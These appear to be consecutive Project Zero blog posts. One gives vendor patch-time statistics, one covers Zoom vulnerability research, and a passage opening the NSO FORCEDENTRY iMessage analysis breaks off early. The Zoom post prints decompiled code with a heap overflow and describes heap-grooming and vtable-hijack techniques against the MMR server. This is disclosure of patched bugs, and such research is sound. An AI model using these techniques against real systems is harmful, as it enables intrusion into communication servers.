To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.

For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).

There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.

The data!

Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.

Deadline adherence

Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.

In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.

Deadline adherence and fix time 2019-2021, by bug report volume

Vendor

Total bugs

Fixed by day 90

Fixed during
grace period

Exceeded deadline

& grace period

Avg days to fix

Apple

84

73 (87%)

7 (8%)

4 (5%)

69

Microsoft

80

61 (76%)

15 (19%)

4 (5%)

83

Google

56

53 (95%)

2 (4%)

1 (2%)

44

Linux

25

24 (96%)

0 (0%)

1 (4%)

25

Adobe

19

15 (79%)

4 (21%)

0 (0%)

65

Mozilla

10

9 (90%)

1 (10%)

0 (0%)

46

Samsung

10

8 (80%)

2 (20%)

0 (0%)

72

Oracle

7

3 (43%)

0 (0%)

4 (57%)

109

Others*

55

48 (87%)

3 (5%)

4 (7%)

44

TOTAL

346

294 (84%)

34 (10%)

18 (5%)

61

* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).

Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a relatively small sample size of only about 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.

Average number of days to fix bugs across all vendors is 61 days. Zooming in on just that stat, we can break it out by year:

Bug fix time 2019-2021, by bug report volume

Vendor

Bugs in 2019

(avg days to fix)

Bugs in 2020

(avg days to fix)

Bugs in 2021

(avg days to fix)

Apple

61 (71)

13 (63)

11 (64)

Microsoft

46 (85)

18 (87)

16 (76)

Google

26 (49)

13 (22)

17 (53)

Linux

12 (32)

8 (22)

5 (15)

Others*

54 (63)

35 (54)

14 (29)

TOTAL

199 (67)

87 (54)

63 (52)

* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020. Microsoft, Apple, and Linux overall have reduced their time to fix during the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the others not represented on the chart have collectively cut their time to fix in more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.

Finally, focusing on just 2021, we see:

  • Only 1 deadline exceeded, versus an average of 9 per year in the other two years
  • The grace period used 9 times (notably with half being by Microsoft), versus the slightly lower average of 12.5 in the other years

Mobile phones

Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.

Vendor

Total bugs

Avg fix time

iOS

76

70

Android (Samsung)

10

72

Android (Pixel)

6

72

The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.

Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc). However, open-source products do provide a window into where time is spent.

Browsers

For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.

Fix time analysis for open-source browsers, by bug volume

Browser

Bugs

Avg days from bug report to public patch

Avg days from public patch to release

Avg days from bug report to release

Chrome

40

5.3

24.6

29.9

WebKit

27

11.6

61.1

72.7

Firefox

8

16.6

21.1

37.8

Total

75

8.8

37.3

46.1

We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to "Avg days from public patch to release" column:

Histogram showing the distributions of time from a fix landing in public to a fix shipping for Firefox, Webkit, and Chrome. The fact that Webkit is still on the higher end of the histogram tells us that most of their time is spent shipping the fixed build after the fix has landed.

The table and chart together tell us a few things:

Chrome is currently the fastest of the three browsers, with time from bug report to releasing a fix in the stable channel in 30 days. The time to patch is very fast here, with just an average of 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public is the bulk of the overall time window, though overall we still see the Chrome (blue) bars of the histogram toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)

Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.

WebKit is the outlier in this analysis, with the longest number of days to release a patch at 73 days. Their time to land the fix publicly is in the middle between Chrome and Firefox, but unfortunately this leaves a very long amount of time for opportunistic attackers to find the patch and exploit it prior to the fix being made available to users. This can be seen by the Apple (red) bars of the second histogram mostly being on the right side of the graph, and every one of them except one being past the 30-day mark.

Analysis, hopes, and dreams

Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patch effectively reducing the overall average time to fix to about 52 days. In 2021, there was only one 90-day deadline exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de-facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.

One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.

For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.

For Apple, we're pleased with the acceleration of patches landing, as well as the recent lack of use of grace periods as well as lack of missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.

For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.

Moving forward

This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.

To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.

Zooming in on Zero-click Exploits

By: Ryan
18 January 2022 at 17:28

Posted by Natalie Silvanovich, Project Zero


Zoom is a video conferencing platform that has gained popularity throughout the pandemic. Unlike other video conferencing systems that I have investigated, where one user initiates a call that other users must immediately accept or reject, Zoom calls are typically scheduled in advance and joined via an email invitation. In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user. However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface. The following post details my investigation into Zoom.

This analysis resulted in two vulnerabilities being reported to Zoom. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

Zoom Attack Surface Overview

Zoom’s main feature is multi-user conference calls called meetings that support a variety of features including audio, video, screen sharing and in-call text messages. There are several ways that users can join Zoom meetings. To start, Zoom provides full-featured installable clients for many platforms, including Windows, Mac, Linux, Android and iPhone. Users can also join Zoom meetings using a browser link, but they are able to use fewer features of Zoom. Finally, users can join a meeting by dialing phone numbers provided in the invitation on a touch-tone phone, but this only allows access to the audio stream of a meeting. This research focused on the Zoom client software, as the other methods of joining calls use existing device features.

Zoom clients support several communication features other than meetings that are available to a user’s Zoom Contacts. A Zoom Contact is a user that another user has added as a contact using the Zoom user interface. Both users must consent before they become Zoom Contacts. Afterwards, the users can send text messages to one another outside of meetings and start channels for persistent group conversations. Also, if either user hosts a meeting, they can invite the other user in a manner that is similar to a phone call: the other user is immediately notified and they can join the meeting with a single click. These features represent the zero-click attack surface of Zoom. Note that this attack surface is only available to attackers that have convinced their target to accept them as a contact. Likewise, meetings are part of the one-click attack surface only for Zoom Contacts, as other users need to click several times to enter a meeting.

That said, it’s likely not that difficult for a dedicated attacker to convince a target to join a Zoom call even if it takes multiple clicks, and the way some organizations use Zoom presents interesting attack scenarios. For example, many groups host public Zoom meetings, and Zoom supports a paid Webinar feature where large groups of unknown attendees can join a one-way video conference. It could be possible for an attacker to join a public meeting and target other attendees. Zoom also relies on a server to transmit audio and video streams, and end-to-end encryption is off by default. It could be possible for an attacker to compromise Zoom’s servers and gain access to meeting data.

Zoom Messages

I started out by looking at the zero-click attack surface of Zoom. Loading the Linux client into IDA, it appeared that a great deal of its server communication occurred over XMPP. Based on strings in the binary, it was clear that XMPP parsing was performed using a library called gloox. I fuzzed this library using AFL and other coverage-guided fuzzers, but did not find any vulnerabilities. I then looked at how Zoom uses the data provided over XMPP.

XMPP traffic seemed to be sent over SSL, so I located the SSL_write function in the binary based on log strings, and hooked it using Frida. The output contained many XMPP stanzas (messages) as well as other network traffic, which I analyzed to determine how XMPP is used by Zoom. XMPP is used for most communication between Zoom clients outside of meetings, such as messages and channels, and is also used for signaling (call set-up) when a Zoom Contact invites another Zoom Contact to a meeting.

I spent some time going through the client binary trying to determine how the client processes XMPP, for example, if a stanza contains a text message, how is that message extracted and displayed in the client. Even though the Zoom client contains many log strings, this was challenging, and I eventually asked my teammate Ned Williamson for help locating symbols for the client. He discovered that several old versions of the Android Zoom SDK contained symbols. While these versions are roughly five years old, and do not present a complete view of the client as they only include some libraries that it uses, they were immensely helpful in understanding how Zoom uses XMPP.

Application-defined tags can be added to gloox’s XMPP parser by extending the class StanzaExtension and implementing the method newInstance to define how the tag is converted into a C++ object. Parsed XMPP stanzas are then processed using the MessageHandler class. Application developers extend this class, implementing the method handleMessage with code that performs application functionality based on the contents of the stanza received. Zoom implements its XMPP handling in CXmppIMSession::handleMessage, which is a large function that is an entrypoint to most messaging and calling features. The final processing stage of many XMPP tags is in the class ns_zoom_messager::CZoomMMXmppWrapper, which contains many methods starting with ‘On’ that handle specific events. I spent a fair amount of time analyzing these code paths, but didn’t find any bugs. Interestingly, Thijs Alkemade and Daan Keuper released a write-up of their Pwn2Own bug after I completed this research, and it involved a vulnerability in this area.

RTP Processing

Afterwards, I investigated how Zoom clients process audio and video content. Like all other video conferencing systems that I have analyzed, it uses Real-time Transport Protocol (RTP) to transport this data. Based on log strings included in the Linux client binary, Zoom appears to use a branch of WebRTC for audio. Since I have looked at this library a great deal in previous posts, I did not investigate it further. For video, Zoom implements its own RTP processing and uses a custom underlying codec named Zealot (libzlt).

Analyzing the Linux client in IDA, I found what I believed to be the video RTP entrypoint, and fuzzed it using afl-qemu. This resulted in several crashes, mostly in RTP extension processing. I tried modifying the RTP sent by a client to reproduce these bugs, but it was not received by the device on the other side and I suspected the server was filtering it. I tried to get around this by enabling end-to-end encryption, but Zoom does not encrypt RTP headers, only the contents of RTP packets (as is typical of most RTP implementations).

Curious about how Zoom server filtering works, I decided to set up Zoom On-Premises Deployment. This is a Zoom product that allows customers to set up on-site servers to process their organization’s Zoom calls. This required a fair amount of configuration, and I ended up reaching out to the Zoom Security Team for assistance. They helped me get it working, and I greatly appreciate their contribution to this research.

Zoom On-Premises Deployments consist of two hosts: the controller and the Multimedia Router (MMR). Analyzing the traffic to each server, it became clear that the MMR is the host that transmits audio and video content between Zoom clients. Loading the code for the MMR process into IDA, I located where RTP is processed, and it indeed parses the extensions as a part of its forwarding logic and verifies them correctly, dropping any RTP packets that are malformed.

The code that processes RTP on the MMR appeared different than the code that I fuzzed on the device, so I set up fuzzing on the server code as well. This was challenging, as the code was in the MMR binary, which was not compiled as a relocatable binary (more on this later). This meant that I couldn’t load it as a library and call into specific offsets in the binary as I usually do to fuzz binaries that don’t have source code available. Instead, I compiled my own fuzzing stub that called the function I wanted to fuzz as a relocatable that defined fopen, and loaded it using LD_PRELOAD when executing the MMR binary. Then my code would take control of execution the first time that the MMR binary called fopen, and was able to call the function being fuzzed.

This approach has a lot of downsides, the biggest being that the fuzzing stub can’t accept command line parameters, execution is fairly slow and a lot of fuzzing tools don’t honor LD_PRELOAD on the target. That said, I was able to fuzz with code coverage using Mateusz Jurczyk’s excellent DrSanCov, with no results.

Packet Processing

When analyzing RTP traffic, I noticed that both Zoom clients and the MMR server process a great deal of packets that didn’t appear to be RTP or XMPP. Looking at the SDK with symbols, one library appeared to do a lot of serialization: libssb_sdk.so. This library contains a great deal of classes with the methods load_from and save_to defined with identical declarations, so it is likely that they all implement the same virtual class.

One parameter to the load_from methods is an object of class msg_db_t,  which implements a buffer that supports reading different data types. Deserialization is performed by load_from methods by reading needed data from the msg_db_t object, and serialization is performed by save_to methods by writing to it.

After hooking a few save_to methods with Frida and comparing the written output to data sent with SSL_write, it became clear that these serialization classes are part of the remote attack surface of Zoom. Reviewing each load_from method, several contained code similar to the following (from ssb::conf_send_msg_req::load_from).

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(

msg_db, &this->str_len, consume_bytes, error_out);

  str_len = this->str_len;

  if ( str_len )

  {

    mem = operator new[](str_len);

    out_len = 0;

    this->str_mem = mem;

    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db, mem, &out_len);

read_str_with_len is defined as follows.

int __fastcall ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db_t* msg, signed __int8 *mem,

unsigned int *len)

{

  if ( !msg->invalid )

  {

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(msg, len, (int)len, 0);

    if ( !msg->invalid )

    {

      if ( *len )

        ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read(msg, mem, *len, 0);

    }

  }

  return msg;

}

Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).

I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms. This vulnerability was assigned CVE-2021-34423 and fixed on November 24, 2021.

Looking at the code for the MMR server, I noticed that ssb::conf_send_msg_req::load_from, the class the vulnerability occurs in was also present on the MMR server. Since the MMR forwards Zoom meeting traffic from one client to another, it makes sense that it might also deserialize this packet type. I analyzed the MMR code in IDA, and found that deserialization of this class only occurs during Zoom Webinars. I purchased a Zoom Webinar license, and was able to crash my own Zoom MMR server by sending this packet. I was not willing to test a vulnerability of this type on Zoom’s public MMR servers, but it seems reasonably likely that the same code was also in Zoom’s public servers.

Looking further at deserialization, I noticed that all deserialized objects contain an optional field of type ssb::dyna_para_table_t, which is basically a properties table that allows a map of name strings to variant objects to be included in the deserialized object. The variants in the table are implemented by the structure ssb::variant_t, as follows.

struct variant{

char type;

short length;

var_data data;

};

union var_data{

        char i8;

        char* i8_ptr;

        short i16;

        short* i16_ptr;

        int i32;

        int* i32_ptr;

        long long i64;

        long long i64*;

};

The value of the type field corresponds to the width of the variant data (1 for 8-bit, 2 for 16-bit, 3 for 32-bit and 4 four 64-bit). The length field specifies whether the variant is an array and its length. If it has the value 0, the variant is not an array, and a numeric value is read from the data field based on its type. If the length field has any other value, the data field is cast to a pointer, an array of that size is read.

My immediate concern with this implementation was that it could be prone to type confusion. One possibility is that a numeric value could be confused with an array pointer, which would allow an attacker to create a variant with a pointer that they specify. However, both the client and MMR perform very aggressive type checks on variants they treat as arrays. Another possibility is that a pointer could be confused with a numeric value. This could allow an attacker to determine the address of a buffer they control if the value is ever returned to the attacker. I found a few locations in the MMR code where a pointer is converted to a numeric value in this way and logged, but nowhere that an attacker could obtain the incorrectly cast value. Finally, I looked at how array data is handled, and I found that there are several locations where byte array variants are converted to strings, however not all of them checked that the byte array has a null terminator. This meant that if these variants were converted to strings, the string could contain the contents of uninitialized memory.

Most of the time, packets sent to the MMR by one user are immediately forwarded to other users without being deserialized by the server. For some bugs, this is a useful feature, for example, it is what allows CVE-2021-34423 discussed earlier to be triggered on a client. However, an information leak in variants needs to occur on the server to be useful to an attacker. When a client deserializes an incoming packet, it is for use on the device, so even if a deserialized string contains sensitive information, it is unlikely that this information will be transmitted off the device. Meanwhile, the MMR exists expressly to transmit information from one user to another, so if a string gets deserialized, there is a reasonable chance that it gets sent to another user, or alters server behavior in an observable way. So, I tried to find a way to get the server to deserialize a variant and convert it to a string. I eventually figured out that when a user logs into Zoom in a browser, the browser can’t process serialized packets, so the MMR must convert them to strings so they can be accessed through web requests. Indeed, I found that if I removed the null terminator from the user_name variant, it would be converted to a string and sent to the browser as the user’s display name.

The vulnerability was assigned CVE-2021-34424 and fixed on November 24, 2021. I tested it on my own MMR as well as Zoom’s public MMR, and it worked and returned pointer data in both cases.

Exploit Attempt

I attempted to exploit my local MMR server with these vulnerabilities, and while I had success with portions of the exploit, I was not able to get it working. I started off by investigating the possibility of creating a client that could trigger each bug outside of the Zoom client, but client authentication appeared complex and I lacked symbols for this part of the code, so I didn’t pursue this as I suspected it would be very time-consuming. Instead, I analyzed the exploitability of the bugs by triggering them from a Linux Zoom client hooked with Frida.

I started off by investigating the impact of heap corruption on the MMR process. MMR servers run on CentOS 7, which uses a modern glibc heap, so exploiting heap unlinking did not seem promising. I looked into overwriting the vtable of a C++ object allocated on the heap instead.

 

I wrote several Frida scripts that hooked malloc on the server, and used them to monitor how incoming traffic affects allocation. It turned out that there are not many ways for an attacker to control memory allocation on an MMR server that are useful for exploiting this vulnerability. There are several packet types that an attacker can send to the server that cause memory to be allocated on the heap and then freed when processing is finished, but not as many where the attacker can trigger both allocation and freeing. Moreover, the MMR server performs different types of processing in separate threads that use unique heap arenas, so many areas of the code where this type of allocation is likely to occur, such as connection management, allocate memory in a different heap arena than the thread where the bug occurs. The only such allocations I could find that were made in the same arena were related to meeting set-up: when a user joins a meeting, certain objects are allocated on the heap, which are then freed when they leave the meeting. Unfortunately, these allocations are difficult to automate as they require many unique users accounts in order for the allocation to be performed repeatedly, and allocation takes an observable amount of time (seconds).

I eventually wrote Frida scripts that looked for free chunks of unusual sizes that bordered C++ objects with vtables during normal MMR operation. There were a few allocation sizes that met this criteria, and since CVE-2021-34423 allows for the size of the buffer that is overflowed to be specified by the attacker, I was able to corrupt the memory of the adjacent object. Unfortunately, heap verification was very robust, so in most cases, the MMR process would crash due to a heap verification error before a virtual call was made on the corrupted object. I eventually got around this by focusing on allocation sizes that are small enough to be stored in fastbins by the heap, as heap chunks that are stored in fastbins do not contain verifiable heap metadata. Chunks of size 58 turned out to be the best choice, and by triggering the bug with an allocation of that size, I was able to control the pointer of a virtual call about one in ten times I triggered the bug.

The next step was to figure out where to point the pointer I could control, and this turned out to be more challenging than I expected. The MMR process did not have ASLR enabled when I did this research (it was enabled in version 4.6.20211128.136, which was released on November 28, 2021), so I was hoping to find a series of locations in the binary that this call could be directed to that would eventually end in a call to execv with controllable parameters, as the MMR initialization code contains many calls to this function. However, there were a few features of the server that made this difficult. First, only the MMR binary was loaded at a fixed location. The heap and system libraries were not, so only the actual MMR code was available without bypassing ASLR. Second, if the MMR crashes, it has an exponential backoff which culminates in it respawning every hour on the hour. This limits how many exploit attempts an attacker has. It is realistic that an attacker might spend days or even weeks trying to exploit a server, but this still limits them to hundreds of attempts. This means that any exploit of an MMR server would need to be at least somewhat reliable, so certain techniques that require a lot of attempts, such as allocating a large buffer on the heap and trying to guess its location were not practical.

I eventually decided that it would be helpful to allocate a buffer on the heap with controlled contents and determine its location. This would make the exploit fairly reliable in the case that the overflow successfully leads to a virtual call, as the buffer could be used as a fake vtable, and also contain strings that could be used as parameters to execv. I tried using CVE-2021-34424 to leak such an address, but wasn’t able to get this working.

This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes, however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy. Other allocated structures, especially larger ones, tend to contain non-pointer data. I was able to get this bug to return heap pointers by specifying a string that was less than 64 bits long, so the nearby allocations were sometimes the pointers themselves, but allocations of this size are so frequent it was not possible to ascertain what heap data they pointed to with any accuracy.

One last idea I had was to use another type confusion bug to leak a pointer to a controllable buffer. There is one such bug in the processing of deserialized ssb::kv_update_req objects. This object’s ssb::dyna_para_table_t table contains a variant named nodeid which represents the specific Zoom client that the message refers to. If an attacker changes this variant to be of type array instead of a 32-bit integer, the address of the pointer to this array will be logged as a string. I tried to combine CVE-2021-34424 with this bug, hoping that it might be possible for the leaked data to be this log string that contains pointer information. Unfortunately, I wasn’t able to get this to work because of timing: the log entry needs to be logged at almost exactly the same time as the bug is triggered so that the log data is still in memory, and I wasn't able to send packets fast enough. I suspect it might be possible for this to work with improved automation, as I was relying on clients hooked with Frida and browsers to interact with the Zoom server, but I decided not to pursue this as it would require tooling that would take substantial effort to develop.

Conclusion

I performed a security analysis of Zoom and reported two vulnerabilities. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

The vulnerabilities in Zoom’s MMR server are especially concerning, as this server processes meeting audio and video content, so a compromise could allow an attacker to monitor any Zoom meetings that do not have end-to-end encryption enabled. While I was not successful in exploiting these vulnerabilities, I was able to use them to perform many elements of exploitation, and I believe that an attacker would be able to exploit them with sufficient investment. The lack of ASLR in the Zoom MMR process greatly increased the risk that an attacker could compromise it, and it is positive that Zoom has recently enabled it. That said, if vulnerabilities similar to the ones that I reported still exist in the MMR server, it is likely that an attacker could bypass it, so it is also important that Zoom continue to improve the robustness of the MMR code.

It is also important to note that this research was possible because Zoom allows customers to set up their own servers, meanwhile no other video conferencing solution with proprietary servers that I have investigated allows this, so it is unclear how these results compare to other video conferencing platforms.

Overall, while the client bugs that were discovered during this research were comparable to what Project Zero has found in other videoconferencing platforms, the server bugs were surprising, especially when the server lacked ASLR and supports modes of operation that are not end-to-end encrypted.

There are a few factors that commonly lead to security problems in videoconferencing applications that contributed to these bugs in Zoom. One is the huge amount of code included in Zoom. There were large portions of code that I couldn’t determine the functionality of, and many of the classes that could be deserialized didn’t appear to be commonly used. This both increases the difficulty of security research and increases the attack surface by making more code that could potentially contain vulnerabilities available to attackers. In addition, Zoom uses many proprietary formats and protocols which meant that understanding the attack surface of the platform and creating the tooling to manipulate specific interfaces was very time consuming. Using the features we tested also required paying roughly $1500 USD in licensing fees. These barriers to security research likely mean that Zoom is not investigated as often as it could be, potentially leading to simple bugs going undiscovered.  

Still, my largest concern in this assessment was the lack of ASLR in the Zoom MMR server. ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective. There is no good reason for it to be disabled in the vast majority of software. There has recently been a push to reduce the susceptibility of software to memory corruption vulnerabilities by moving to memory-safe languages and implementing enhanced memory mitigations, but this relies on vendors using the security measures provided by the platforms they write software for. All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.

The closed nature of Zoom also impacted this analysis greatly. Most video conferencing systems use open-source software, either WebRTC or PJSIP. While these platforms are not free of problems, it’s easier for researchers, customers and vendors alike to verify their security properties and understand the risk they present because they are open. Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it. While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive. Zoom, and other companies that produce closed-source security-sensitive software should consider how to make their software accessible to security researchers.

A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

By: Ryan
15 December 2021 at 17:00

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.

Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860.

NSO

NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities.

For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products" Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regime, hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff and dozens of other cases.

Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent."

Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.

From One to Zero

In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages:

Screenshots of Phishing SMSs reported to Citizen Lab in 2016

source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.

One weird trick

The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username.

iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif:

  [IMGIFUtils copyGifFromPath:toDestinationPath:error]

